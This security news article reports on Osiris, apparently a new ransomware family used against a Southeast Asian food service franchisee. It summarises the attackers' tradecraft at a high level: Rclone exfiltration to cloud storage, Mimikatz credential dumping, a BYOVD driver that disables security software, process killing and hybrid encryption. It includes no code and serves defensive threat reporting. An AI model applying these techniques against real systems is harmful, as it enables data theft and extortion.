“Osiris” Rises: New Ransomware Targets Southeast Asian Food Giant with Advanced Tactics

A new ransomware family, borrowing the name of the ancient Egyptian god of the dead, has emerged in a high-profile attack against a major food service franchisee in Southeast Asia. Dubbed Osiris, this fresh threat was first spotted in November 2025, deploying a sophisticated arsenal of “living off the land” tools and malicious drivers to paralyze its victim’s operations.

While the name might sound familiar to security veterans, investigators from the Threat Hunter Team (Symantec and Carbon Black) emphasize that this is a unique breed. “While this Osiris ransomware shares a name with a ransomware family from 2016… investigation found that this threat is unique and appears to be a completely new ransomware family”.

The origins of Osiris remain shrouded in mystery, but its tactics bear striking resemblances to known heavy hitters in the ransomware space. The attack chain suggests potential links—or at least shared tradecraft—with the Inc ransomware group.

Key overlaps include:

• Data Exfiltration: The attackers used Rclone to siphon data to a Wasabi cloud storage bucket—a tactic “previously used in October 2025 by Inc ransomware attackers”.
• Mimikatz Usage: A specific version of the credential-dumping tool Mimikatz, named kaz.exe, was deployed. This same filename and version were “previously used by attackers deploying the Inc ransomware,” hinting at a crossover in personnel or toolkits.

Additionally, the attack employed Poortry, a malicious driver previously favored by the Medusa ransomware gang. This driver masqueraded as a legitimate antivirus component to disable security software from the kernel level—a classic “Bring Your Own Vulnerable Driver” (BYOVD) attack.

Osiris is not a blunt instrument; it is a precise tool designed for maximum disruption. It uses a “hybrid encryption scheme: ECC + AES-128-CTR,” generating a unique key for every file it locks.

Before encryption begins, the malware terminates critical processes to ensure files are not locked by the system. The kill list includes database services like SQL and Oracle, as well as productivity apps like Excel, Word, and Outlook .

“It creates a ransom note titled Osiris-MESSAGE.txt,” which directs victims to a negotiation chat, completing the classic extortion loop.

The emergence of Osiris signals that the ransomware landscape remains volatile and dangerous. “The impact this new Osiris ransomware will have on the ransomware landscape in general remains to be seen,” the report concludes. However, the sophisticated toolset suggests it is being “wielded by experienced attackers” who know exactly how to bypass modern defenses.

Organizations are advised to monitor for the specific tools used in this campaign, including Netscan, Netexec, and modified versions of Rustdesk, to catch the threat before encryption begins.

Related Posts:

• Lynx Ransomware: The Evolution of INC Ransomware into a Potent Cyber Threat
• Medusa Ransomware: A Sinister Evolution in Cyber Extortion
• Medusa Exploits Fortinet Flaw (CVE-2023-48788) for Stealthy Ransomware Attacks
• FBI, CISA, and MS-ISAC Warn Organizations About Medusa Ransomware Attacks
• Zoom Addresses Multi High-Severity Vulnerabilities in Workplace Apps and SDKs